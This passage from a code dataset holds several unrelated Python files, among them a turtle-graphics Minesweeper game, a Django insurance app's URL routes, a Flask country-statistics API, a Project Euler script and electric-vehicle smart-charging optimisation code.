self.__t.end_fill()\n\n\n\nclass Minesweeper:\n def __init__(self,rows=14,columns=14,mines=15,bombsvis=False):\n self.__grid = []\n self.__t = turtle.Turtle()\n self.__s = self.__t.getscreen()\n self.__t.speed(0)\n self.__s.onclick(self.__mouseClick)\n self.__s.listen()\n self.__s.tracer(1000,0)\n self.__s.update()\n scale = 10*max(rows,columns)\n turtle.setworldcoordinates(-.5*scale,-.5*scale,3/2*scale,3/2*scale)\n #scales the grid based on how many rows/columns there are - grid always takes up same amount of screen space.\n self.__t.hideturtle()\n\n\n counter1 = 0\n gridcolumns = []\n y = 0\n x = 0\n\n\n while counter1 < rows: #making a nested list of cells\n width = 10\n height = 10\n counter1 += 1\n x = 0\n counter2 = 0\n\n while counter2 < columns:\n newcell = Cell(x,y,width,height)\n gridcolumns.append(newcell)\n counter2 += 1\n x += width\n newcell.draw()\n self.__s.update()\n self.__grid.append(gridcolumns)\n y += height\n gridcolumns = []\n\n\n remainingmines = 0\n while remainingmines < mines: #sets # of mines based on given argument\n newminex = random.randint(0,columns-1)\n newminey = random.randint(0,rows-1)\n if self.__grid[newminey][newminex].isBomb() == False:\n self.__grid[newminey][newminex].setBomb()\n remainingmines += 1\n\n\n if bombsvis:\n counter1 = 0\n while counter1 < columns:\n counter2 = 0\n while counter2 < rows:\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n counter1 +=1\n\n def countBombs(self,row,col):\n numberofbombs = 0\n for y in range(row - 1, row + 2):\n for x in range(col - 1, col + 2):\n if self.__grid[y][x].isBomb():\n numberofbombs += 1\n return numberofbombs\n\n def cellsRemaining(self):\n cellsnum = 0\n for a in range(0,len(self.__grid)):\n for b in range(0,len(self.__grid[0])):\n if not self.__grid[a][b].isCleared() and not self.__grid[a][b].isBomb():\n cellsnum += 1\n return(cellsnum)\n\n\n def getRowCol(self,x,y):\n if x/10 < len(self.__grid) and x/10 > 0 and y/10 < len(self.__grid[0]) and y/10 > 0:\n return (x/10),(y/10)\n 
else:\n return (-1,-1)\n\n\n def __mouseClick(self,x,y):\n (x,y) = self.getRowCol(x,y)\n row = int(y)\n col = int(x)\n\n if x != -1 and y != -1: #to make sure clicking outside grid doesn't clear cell [-1,-1]\n if not self.__grid[row][col].isCleared():\n\n if self.__grid[row][col].isBomb():\n self.__t.penup()\n self.__t.goto(25,-20)\n self.__t.pendown()\n self.__t.write(\"You lose, loser\", font=(\"Arial\",45,\"normal\"),align=\"center\") #plz don't be offended i just thought this was funny\n self.__t.penup()\n self.__t.goto(25,-30)\n self.__t.pendown()\n self.__t.write(\"Click mouse to exit\", font=(\"Arial\",25,\"normal\"),align=\"center\")\n\n counter1 = 0\n while counter1 < len(self.__grid):\n counter2 = 0\n while counter2 < len(self.__grid[0]):\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n counter1 +=1\n self.__s.update()\n self.__s.exitonclick()\n\n else:\n self.clearCell(row,col)\n\n if self.cellsRemaining() == 0:\n self.__t.penup()\n self.__t.goto(25,-20)\n self.__t.pendown()\n self.__t.write(\"You win, winner!\", font=(\"Arial\",45,\"normal\"),align=\"center\")\n self.__t.penup()\n self.__t.goto(25,-30)\n self.__t.pendown()\n self.__t.write(\"Click mouse to exit\", font=(\"Arial\",25,\"normal\"),align=\"center\")\n\n\n counter1 = 0\n while counter1 < len(self.__grid):\n counter2 = 0\n while counter2 < len(self.__grid[0]):\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n\n counter1 +=1\n self.__s.exitonclick()\n\n\n\n\n def clearCell(self,row,col):\n\n self.__grid[row][col].clear()\n\n\n if self.hasneighborMine(row,col) == 0:\n for a in range(row-1,row+2):\n if a >= 0 and a < len(self.__grid):\n for b in range(col-1,col+2):\n if b >= 0 and b < len(self.__grid[0]):\n if not self.__grid[a][b].isCleared():\n self.__s.update() #had to update in here to avoid glitchiness for the cell clearing, bit slower but smoother animation - you can keep playing as it clears\n self.clearCell(a,b)\n\n\n\n\n\n\n def hasneighborMine(self,row,col): #added method that checks for neighbors for the recursive clear cell\n minenumber = 0\n for y in range(row-1,row+2):\n if y >= 0 and y < len(self.__grid):\n for x in range(col-1,col+2):\n if x >= 0 and x < len(self.__grid[0]):\n if self.__grid[y][x].isBomb():\n\n minenumber += 1\n if minenumber > 0:\n self.__grid[row][col].showcount(minenumber)\n return minenumber\n\n\n\n\n\n\ndef main():\n\n newgame = Minesweeper(15,15,14)\n\nif __name__ == '__main__':\n main()\n","repo_name":"EmilyKolb/happygolucky","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70945570457","text":"# Author: Deendayal Kumawat\n\"\"\" Date: 22/12/19\nDescriptions: Loop\"\"\"\n\nnum = int(input(\"Enter any Numer...........\"))\nprime = True\nfor i in range(2, num):\n if num % i == 0 :\n prime = False\n break\nif prime:\n print(\"This is Prime Number\")\nelse:\n print(\"This is not Prime Number\")\n","repo_name":"ddsha441981/Python-Sample-Code","sub_path":"chapter_07_Loops_in_Python/practice_07/practice_05.py","file_name":"practice_05.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14519535019","text":"\"\"\"proyecto_tarea URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom . import views\nfrom django.urls import path, include\nfrom .views import VendedorListar, VendedorNueva, VendedorBorrar, VendedorEditar, PolizaListar, PolizaNueva \\\n , HospitalListar, HospitalNuevo, HospitalEditar, HospitalBorrar, AseguradoNuevo, AseguradoEditar, AseguradoBorrar, \\\n AseguradoListar, PolizaEditar, PolizaBorrar, index, ContratoPoliza, ContratoPolizaListar, home, TemplateSinPrivilegio, \\\n DoctorNuevo, DoctorBorrar, DoctorEditar, DoctorListar, FamiliaresBorrar, FamiliaresEditar, FamiliaresListar, \\\n FamiliaresNuevo, HospitalizacionNuevo, HospitalizacionBorrar, HospitalizacionListar, HospitalizacionEditar, \\\n TratamientoNuevo, TratamientoBorrar, TratamientoEditar, TratamientoListar, DetalleTratamientoNuevo, \\\n DetalleTratamientoBorrar, DetalleTratamientoEditar, DetalleTratamientoListar, AseguradoFamiliarLista, ContratoPolizaEditar, \\\n ContratoPolizaBorrar\nfrom .reportes import reporte_vendedores, reporte_contrato\n\nurlpatterns = [\n path('home', home, name='home'),\n path(\"vendedores/\", VendedorListar.as_view(), name=\"vendedor_listar\"),\n path(\"vendedores/nuevo/\", VendedorNueva.as_view(), name=\"vendedor_nuevo\"),\n path(\"vendedores/editar/\", VendedorEditar.as_view(), name=\"vendedor_editar\"),\n path(\"vendedores/borrar/\", VendedorBorrar.as_view(), name=\"vendedor_borrar\"),\n\n path(\"polizas/\", PolizaListar.as_view(), name=\"poliza_listar\"),\n path(\"polizas/nuevo/\", PolizaNueva.as_view(), name=\"poliza_nuevo\"),\n path(\"polizas/editar/\", PolizaEditar.as_view(), name=\"poliza_editar\"),\n path(\"polizas/borrar/\", PolizaBorrar.as_view(), name=\"poliza_borrar\"),\n\n path(\"hospitales/\", HospitalListar.as_view(), name=\"hospital_listar\"),\n path(\"hospitales/nuevo/\", HospitalNuevo.as_view(), name=\"hospital_nuevo\"),\n path(\"hospitales/editar/\", HospitalEditar.as_view(), name=\"hospital_editar\"),\n path(\"hospitales/borrar/\", HospitalBorrar.as_view(), name=\"hospital_borrar\"),\n\n path(\"asegurados/nuevo/\", AseguradoNuevo.as_view(), name=\"asegurado_nuevo\"),\n path(\"asegurados/editar/\", AseguradoEditar.as_view(), name=\"asegurado_editar\"),\n path(\"asegurados/borrar/\", AseguradoBorrar.as_view(), name=\"asegurado_borrar\"),\n path(\"asegurados/\", AseguradoListar.as_view(), name=\"asegurado_listar\"),\n\n # path(\"\", views.loginpage, name=\"loginpage\"),\n # path(\"login/\", views.loginpage, name=\"loginpage\"),\n path(\"\", auth_views.LoginView.as_view(template_name='cha_app/login.html'), name=\"login\"),\n path(\"\", auth_views.LogoutView.as_view(template_name='cha_app/login.html'), name=\"logout\"),\n path('sin_privilegios/', TemplateSinPrivilegio.as_view(), name='sin_privilegios'),\n # path(\"login/\", auth_views.LoginView.as_view(template_name='cha_app/login.html'), name=\"login\"),\n path(\"contratos/\", ContratoPolizaListar.as_view(), name=\"contrato_listar\"),\n path(\"contratos/nuevo/\", 
ContratoPoliza.as_view(), name=\"contrato_nuevo\"),\n path(\"contratos/editar/\", ContratoPolizaEditar.as_view(), name=\"contrato_editar\"),\n path(\"contratos/borrar/\", ContratoPolizaBorrar.as_view(), name=\"contrato_borrar\"),\n\n path(\"doctor/nuevo/\", DoctorNuevo.as_view(), name=\"doctor_nuevo\"),\n path(\"doctor/editar/\", DoctorEditar.as_view(), name=\"doctor_editar\"),\n path(\"doctor/borrar/\", DoctorBorrar.as_view(), name=\"doctor_borrar\"),\n path(\"doctor/\", DoctorListar.as_view(), name=\"doctor_listar\"),\n\n path(\"familiares/nuevo/\", FamiliaresNuevo.as_view(), name=\"familiares_nuevo\"),\n path(\"familiares/editar/\", FamiliaresEditar.as_view(), name=\"familiares_editar\"),\n path(\"familiares/borrar/\", FamiliaresBorrar.as_view(), name=\"familiares_borrar\"),\n path(\"familiares/\", AseguradoFamiliarLista.as_view(), name=\"familiares_listar\"),\n path(\"familiares/listar/\", FamiliaresListar.as_view(), name=\"familiares_asegurado_listar\"),\n\n path(\"reportes/vendedores/\", reporte_vendedores, name='vendedores_print_all'),\n path(\"reportes/contratos/\", reporte_contrato, name='contrato_print'),\n\n path(\"hospitalizaciones/nuevo/\", HospitalizacionNuevo.as_view(), name=\"hospitalizaciones_nuevo\"),\n path(\"hospitalizaciones/editar/\", HospitalizacionEditar.as_view(), name=\"hospitalizaciones_editar\"),\n path(\"hospitalizaciones/borrar/\", HospitalizacionBorrar.as_view(), name=\"hospitalizaciones_borrar\"),\n path(\"hospitalizaciones/\", HospitalizacionListar.as_view(), name=\"hospitalizaciones_listar\"),\n\n path(\"tratamientos/nuevo/\", TratamientoNuevo.as_view(), name=\"tratamiento_nuevo\"),\n path(\"tratamientos/editar/\", TratamientoEditar.as_view(), name=\"tratamiento_editar\"),\n path(\"tratamientos/borrar/\", TratamientoBorrar.as_view(), name=\"tratamiento_borrar\"),\n path(\"tratamientos/\", TratamientoListar.as_view(), name=\"tratamiento_listar\"),\n\n\n path(\"detalletratamientos/nuevo/\", DetalleTratamientoNuevo.as_view(), name=\"detalletratamiento_nuevo\"),\n path(\"detalletratamientos/editar/\", DetalleTratamientoEditar.as_view(), name=\"detalletratamiento_editar\"),\n path(\"detalletratamientos/borrar/\", DetalleTratamientoBorrar.as_view(), name=\"detalletratamiento_borrar\"),\n path(\"detalletratamientos/listar/\", DetalleTratamientoListar.as_view(), name=\"detalletratamiento_listar\"),\n]\n","repo_name":"edgarahl/entornovirtual","sub_path":"entvirt/script/proyecto_tarea/cha_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70897567576","text":"# leetcode problem number 410 \ndef findPices(nums , target):\n pices = 1\n tempSum = 0\n if (len(nums) <1):\n return 0\n \n for number in nums: \n tempSum += number\n if(tempSum > target):\n pices += 1\n tempSum = number\n return pices\n \n\n \n\ndef splitArray(nums , m):\n start = max(nums)\n end = sum(nums)\n\n while start \", methods=[\"GET\"])\ndef get_top_10(parameter):\n parameter = parameter.lower().strip()\n\n if parameter not in [\"population\", \"area\", \"density\"]:\n result = jsonify({\n \"message\": \"The only valid parameters for this \\\n endpoint are: population, area, density.\"\n })\n return result\n\n try:\n cursor = mysql.connection.cursor()\n\n query = \"SELECT * FROM countries ORDER BY {} DESC\".format(parameter)\n cursor.execute(query)\n records = cursor.fetchall()[:10]\n\n result = []\n for record in records:\n country = {\n \"name\": record[0],\n 
\"capital\": record[1],\n \"language\": record[2].replace(\"\\\"\", \"\"),\n \"population\": record[3],\n \"density (per km2)\": record[4],\n \"area (km2)\": record[5],\n \"time_zone\": record[6],\n \"currency\": record[7],\n \"government\": record[8]\n }\n result.append(country)\n\n result = Response(json.dumps(result), mimetype=\"application/json\")\n except:\n result = jsonify({\n \"message\": \"There was a problem reading from the database.\"\n })\n finally:\n cursor.close()\n \n return result\n\n\"\"\"\nThe /all endpoint. Returns every entry in the database that fulfills\na certain condition, given by the query parameters.\n\"\"\"\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all():\n args = request.args\n pairs = []\n values = []\n\n # The format of the database query depends on which set\n # of query parameters was given\n for key in [\"name\", \"capital\", \"population\", \n \"density\", \"area\", \"currency\"]:\n if key in args:\n pairs.append(\"lower(\" + key + \") = %s\")\n values.append(args[key].lower().strip())\n\n for key in [\"language\", \"government\"]:\n if key in args:\n pairs.append(\"lower(\" + key + \") LIKE %s\")\n values.append(\"%\" + args[key].lower().strip() + \"%\")\n \n if \"time_zone\" in args:\n value = args[\"time_zone\"].lower().strip()\n\n if (\"+\" not in value) and (\"-\" not in value):\n pairs.append(\"lower(time_zone) = %s\")\n values.append(value)\n else:\n if \"+\" in value:\n split = value.split(\"+\")\n sign = \"+\"\n else:\n split = value.split(\"-\")\n sign = \"-\"\n\n pairs.append(\"lower(time_zone) = %s \\\n OR lower(time_zone) = %s \\\n OR lower(time_zone) = %s \\\n OR lower(time_zone) = %s\")\n values.append(value)\n values.append(value + \":00\")\n values.append(split[0] + sign + \"0\" + split[1])\n values.append(split[0] + sign + \"0\" + split[1] + \":00\")\n \n # If no valid query parameters are provided, it will return\n # information about every single country found in the database\n if len(pairs) == 0:\n pairs = [\"1\"]\n \n try:\n cursor = mysql.connection.cursor()\n\n query = \"SELECT * FROM countries WHERE {}\".format(\" AND \".join(pairs))\n cursor.execute(query, values)\n records = cursor.fetchall()\n\n result = []\n for record in records:\n country = {\n \"name\": record[0],\n \"capital\": record[1],\n \"language\": record[2].replace(\"\\\"\", \"\"),\n \"population\": record[3],\n \"density (per km2)\": record[4],\n \"area (km2)\": record[5],\n \"time_zone\": record[6],\n \"currency\": record[7],\n \"government\": record[8]\n }\n result.append(country)\n\n result = Response(json.dumps(result), mimetype=\"application/json\")\n except:\n result = jsonify({\n \"message\": \"There was a problem reading from the database.\"\n })\n finally:\n cursor.close()\n\n return result\n\n\"\"\"The main function that allows the API to run.\"\"\"\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"vanessahoamea/States-of-the-World","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23389976726","text":"#! 
python\nimport sys\nimport math\n\n\ndef getN(i):\n cnt = 0;\n ranges = (i/math.sqrt(2));\n for j in range(math.ceil(i/2.0-ranges),0):\n if i*i/2-(i/2-j)*(i/2-j)<0:\n print(str(i*i/2)+ \" \" + str((i/2-j)*(i/2-j)))\n test = math.sqrt(i*i/2-(i/2-j)*(i/2-j))+i/2;\n if( test==math.floor(test)):\n cnt+=1; \n return cnt\n cnt = (cnt * 2 + 1) * 4;\n \n #print(str(i) + \" | \" + str(cnt) + \" | \" + str((cnt-4)/8));\npossible = []\ndef recursive(past):\n base = 1\n tnp = list(past)\n for i in range(len(past)):\n base *=(2*past[i])+1\n number = 0\n while(1==1):\n number+=1\n n = (base*(2*number+1)-1)/2\n if n==52:\n retString = \"\"\n for i in range(len(past)):\n retString += str(past[i]) + \" \"\n retString += str(number)\n print(retString)\n elif n>52:\n break\n else:\n tnp.append(number)\n recursive(tnp)\n tnp.pop()\n\ndef isPrime(number):\n if(number<2):\n return False\n for i in range(2,math.floor(math.ceil(number))):\n if number%i==0:\n return False\n return True\n#print(getN(171640625))\narray = []\nrecursive(array)\n\ntotal = 0\nlimit3 = 10**11\n\nlimit = 4733728\nd2 = dict()\nd = dict()\nfor i in range(1,100000):\n base = i*i\n #print(i)\n if base>limit:\n break\n #print(i)\n for j in range((i%2)+1,i,2):\n #print(j)\n baseJ = base + j*j\n if baseJ == 117:\n print(str(i) + \" | \" + str(j) + \" | \" + str(baseJ))\n if baseJ>limit:\n break\n #if (not isPrime(baseJ)):\n # break\n else:\n key = math.floor(baseJ)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1\n for k in range(1,limit):\n x = k * baseJ\n if x>limit:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in d2:\n d2[key] += 1\n else:\n d2[key] = 1\nprint(\"done\")\n\nlimit2 = 278455\n\ndic = dict()\nPrime = dict()\nfor w in d:\n if d[w]==1 and d2[w]==1:\n dic[w] = 1\n for i in range(w,limit2,w):\n Prime[i] = 1\nprint(\"done2\")\n\n\nnonPrime = dict()\nfor i in range (1, limit2):\n if not i in Prime:\n nonPrime[i] = 1\nprint(\"done3\")\n\nnonPrime = sorted(nonPrime)\n\nPrimes = sorted(dic)\n\n'''sys.exit()\nfor w in Primes:\n print(w)\nsys.exit()'''\n\nfor w in Primes:\n #print(w)\n base1 = w*w*w\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e\n if base2>limit3:\n break;\n for r in Primes:\n if r == w or r == e:\n continue\n num = base2*r\n if num>limit3:\n break\n multiplier = 0\n limit4 = math.floor(limit3/num)\n if limit4>limit2:\n print(\"what\" + str(limit4))\n for t in nonPrime:\n #print(t)\n if t > limit4:\n break\n multiplier += t\n total += multiplier*num\n #print(w*w*w*e*e*r)\n\n\n\nfor w in Primes:\n #print(w)\n base1 = w**10\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e\n if base2>limit3:\n break;\n multiplier = 0\n limit4 = math.floor(limit3/base2)\n for t in nonPrime:\n #print(t)\n if t > limit4:\n break\n multiplier += t\n total += multiplier*base2\n\n\nfor w in Primes:\n #print(w)\n base1 = w**7\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e*e\n if base2>limit3:\n break;\n #print(str(w) + \" | \" + str(e) + \" | \" + str(base2))\n multiplier = 0\n limit4 = math.floor(limit3/base2)\n for t in nonPrime:\n if t > limit4:\n break\n #print(t)\n multiplier += t\n total += multiplier*base2\nprint(total)\n\n#for w in d:\n# print(w)\nsys.exit()\n\nd = dict()\nfor i in range(1,100000):\n base = i*i\n if base>10**4:\n break\n #print(i)\n for j in range((i%2)+1,i,2):\n #print(j)\n baseJ = base + j*j\n if baseJ>10**4:\n break\n else:\n key 
= math.floor(baseJ)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1\n '''for k in range(1,100000):\n x = k * baseJ\n if x == 325:\n print (str(i) + \" | \" + str(j) + \" | \" + str(k))\n if x>10**4:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1'''\ndic = dict()\nfor w in sorted(d, key=d.get, reverse=True):\n for k in range(1,100000):\n x = k * w\n if x == 1105:\n print (str(w) + \" | \" + str(d[w]) + \" | \" + str(k))\n if x>10**4:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in dic:\n dic[key] += d[w]\n else:\n dic[key] = d[w]\nfor key in dic:\n if key == 1105:\n print(str(key) + \" | \" + str(dic[key]))\n if dic[key] == 52:\n print(key)\n \n\n\n\n\n\n#getN(359125)\n\n#for i in range(math.floor((10**11)/((5**3)*(13**2)))):\n'''for i in range(1000):\n if(isPrime(i)):\n cnt = getN(i)\n if cnt==1:\n print(i)\n elif cnt>1:\n print(str(i) + \" \" + str(cnt))\n'''\n\n\n\n'''cnt = 0;\ntest = 0;\nranges = 0;\nmaxes = 0;\nnumbers_sizes = (29*13*13*17*17*5**exp for exp in range(0, 13))\nnumbers_sizes = ((17**a)*(13**b)*(5**c) for a in range(0, 4) for b in range(0, 4) for c in range(0, 4))\nfor i in numbers_sizes: #range(3,220):\n cnt = 0;\n ranges = (i/1.41421356);\n for j in range(math.ceil(i/2.0-ranges),0):\n test = math.sqrt(i*i/2-(i/2-j)*(i/2-j))+i/2;\n if( test==math.floor(test)):\n cnt+=1; \n cnt = (cnt * 2 + 1) * 4;\n \n print(str(i) + \" | \" + str(cnt) + \" | \" + str((cnt-4)/8));\n'''\n\n\n\n\n'''x^52\nx*y^17\nx^2+\n\n(x)(2y+1)(2z+1) + yx(min(x,y,z))\n\n\n2zx+x+z\n\na=zx+(z+1)/2\n\nx(2y+1)(2z+1)+((2y+1)(2z+1)+1)/2-1\n\n((2x+1)(2y+1)(2z+1)-1)/2'''","repo_name":"rorico/Side-Projects","sub_path":"Project Euler/233.py","file_name":"233.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26560927280","text":"from google.cloud.aiplatform.metadata import metadata\n\nfrom vertexai.preview import developer\nfrom vertexai.preview import hyperparameter_tuning\nfrom vertexai.preview import initializer\nfrom vertexai.preview import tabular_models\nfrom vertexai.preview._workflow.driver import (\n remote as remote_decorator,\n)\nfrom vertexai.preview._workflow.shared import (\n model_utils,\n)\n\n\nglobal_config = initializer.global_config\ninit = global_config.init\nremote = remote_decorator.remote\nVertexModel = remote_decorator.VertexModel\nregister = model_utils.register\nfrom_pretrained = model_utils.from_pretrained\n\n# For Vertex AI Experiment.\n\n# ExperimentRun manipulation.\nstart_run = metadata._experiment_tracker.start_run\nend_run = metadata._experiment_tracker.end_run\nget_experiment_df = metadata._experiment_tracker.get_experiment_df\n\n# Experiment logging.\nlog_params = metadata._experiment_tracker.log_params\nlog_metrics = metadata._experiment_tracker.log_metrics\nlog_time_series_metrics = metadata._experiment_tracker.log_time_series_metrics\nlog_classification_metrics = metadata._experiment_tracker.log_classification_metrics\n\n\n__all__ = (\n \"init\",\n \"remote\",\n \"VertexModel\",\n \"register\",\n \"from_pretrained\",\n \"start_run\",\n \"end_run\",\n \"get_experiment_df\",\n \"log_params\",\n \"log_metrics\",\n \"log_time_series_metrics\",\n \"log_classification_metrics\",\n \"developer\",\n \"hyperparameter_tuning\",\n 
\"tabular_models\",\n)\n","repo_name":"googleapis/python-aiplatform","sub_path":"vertexai/preview/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"5025653457","text":"\"\"\"\nCollection of functions for Smart Chargng\n\"\"\"\nfrom pulp import *\nimport numpy as np\nimport plotly.graph_objects as go\nimport datetime\nimport pandas as pd\nfrom sklearn_extra.cluster import KMedoids\n\ndef PerfectForesight(b0, bmax, bmin, xmax, c, c_tilde, u, z, T, tvec, r=1, verbose=True):\n # Init problem \n prob = LpProblem(\"mpc1\", LpMinimize)\n\n # Init variables\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=bmax*1.25, cat='Continuous')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous')\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub, cat='Continuous') for i, ub in enumerate(bmin)}\n b[0] = b0\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]) + [100*c_tilde*(s[t]+s2[t+1]) for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == b[t] + x[t]*r - u[t]\n prob += b[t+1] >= bmin[t+1] - s2[t+1]\n prob += b[t+1] <= bmax + s[t]\n prob += x[t] <= xmax * z[t]\n prob += x[t] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(msg=1))\n else:\n prob.solve(PULP_CBC_CMD(msg=0))\n\n # Return objective without penalization\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]))\n\n # Return results\n return(prob, x, b)\n\ndef ImperfectForesight(b0, bmax, bmin, xmax, c, c_tilde, u_t_true, u_forecast, z, T, tvec, r, verbose=False):\n # Init problem \n prob = LpProblem(\"mpc1\", LpMinimize)\n\n # Init variabless\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=5000, cat='Continuous')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous') # Add penalizing slack for violating bmax=80%, but still remain below 100%\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub) for i, ub in enumerate(bmin)}\n b[0] = b0; #s2[0] = 0;\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * ((b[T+1])-b[0]) + [c_tilde*100*s[t] + c_tilde*100*s2[t+1] for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == b[t] + x[t]*r - u_forecast[t]\n prob += b[t+1] >= bmin[t+1] - s2[t+1] # Punishment slack variable for violating bmin at t+1\n prob += b[t+1] <= bmax + s[t] # Punishment slack variable for violating bmax at t\n prob += x[t] <= xmax * z[t]\n prob += x[t] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(msg=1)) \n else:\n prob.solve(PULP_CBC_CMD(msg=0))\n\n # Update b1 with actual use (relative to what we chose to charge)\n b[1] = b[0] + x[0]*r - u_t_true\n prob.assignVarsVals({'b_1': b[1]})\n\n # Return results\n return(prob, x, b)\n\n\ndef plot_EMPC(prob, name=\"\", x=np.nan, b=np.nan, u=np.nan, c=np.nan, z=np.nan, starttime='', endtime='', export=False, export_only = False, BatteryCap=60, firsthour=0, vehicle_id='', SOCorg=None):\n fig = go.Figure()\n if type(prob) == dict:\n tvec = np.arange(0, len(prob['x']))\n tvec_b = np.arange(0, len(prob['b']))\n fig.add_trace(go.Scatter(x=tvec_b, y=[value(prob['b'][t]) for t in tvec_b], mode='lines', name='State-of-Charge'))\n fig.add_trace(go.Scatter(x=tvec, 
y=[value(prob['u'][t]) for t in tvec], mode='lines', name='Use'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(prob['x'][t]) for t in tvec], mode='lines', name='Charging'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(prob['c'][t]) for t in tvec], mode='lines', name='True Price'))\n fig.add_trace(go.Scatter(x=tvec, y=[prob['z'][t]*2-1 for t in tvec], mode='lines', name='Plugged-in', line=dict(color='black', width=0.5)))\n obj = prob['objective']\n if SOCorg is not None:\n fig.add_trace(go.Scatter(x=tvec_b, y=[SOCorg[t] for t in tvec_b], mode='lines', name='Original SOC'))\n BatteryCap = max(BatteryCap, np.max(SOCorg), np.max([value(prob['b'][t]) for t in tvec_b]))\n \n else:\n tvec = np.arange(0, len(x))\n tvec_b = np.arange(0, len(b))\n obj = value(prob.objective)\n fig.add_trace(go.Scatter(x=tvec_b, y=[value(b[t]) for t in tvec_b], mode='lines', name='State-of-Charge'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(u[t]) for t in tvec], mode='lines', name='Use'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(x[t]) for t in tvec], mode='lines', name='Charging'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(c[t]) for t in tvec], mode='lines', name='True Price'))\n fig.add_trace(go.Scatter(x=tvec, y=[z[t]*2-1 for t in tvec], mode='lines', name='Plugged-in', line=dict(color='black', width=0.5)))\n \n fig.update_xaxes(tickvals=tvec_b[::24]+firsthour, ticktext=[str(t//24) for t in tvec_b[::24]+firsthour])\n\n fig.update_yaxes(range=[-3, BatteryCap+2])\n\n fig.update_layout(title=name + \" from \" + starttime +\" to \"+ endtime+\" Total raw cost: \" + str(round(obj)) + \" DKK\",\n xaxis_title=\"Days\",\n yaxis_title=\"kWh or DKK/kWh or [T/F]\")\n if not export_only:\n fig.show()\n\n ## Export figure\n if export:\n if vehicle_id != '':\n # Make vehicle_unique folder\n vehicle_id = str(vehicle_id) + \"/\"\n if not os.path.exists(\"plots/MPC/\"+vehicle_id):\n os.makedirs(\"plots/MPC/\"+vehicle_id)\n if not os.path.exists(\"plots/MPC/\"+vehicle_id + \"pdfs/\"):\n os.makedirs(\"plots/MPC/\"+vehicle_id + \"pdfs/\")\n fig.write_html(\"plots/MPC/\"+vehicle_id + name + \"_mpc.html\")\n layout = dict(font=dict(family='Computer Modern',size=9),\n margin=dict(l=5, r=5, t=30, b=5),\n width=605, height= 250,\n title_x = 0.5,\n legend=dict(orientation=\"h\", yanchor=\"bottom\", y=-.30, xanchor=\"right\", x=1))\n # Move xaxis title to the bottom left\n fig.update_xaxes(title_text=\"Days .\")\n fig.update_layout(layout)\n # Decrease linewidth of all lines except for \"Plugged-in\"\n for i in range(len(fig.data)-1):\n fig.data[i].line.width = 1.5\n fig.write_image(\"plots/MPC/\"+vehicle_id + \"pdfs/\" + name + \"_mpc.pdf\")\n\ndef DumbCharge(b0, bmax, bmin, xmax, c, c_tilde, u, z, T, tvec, 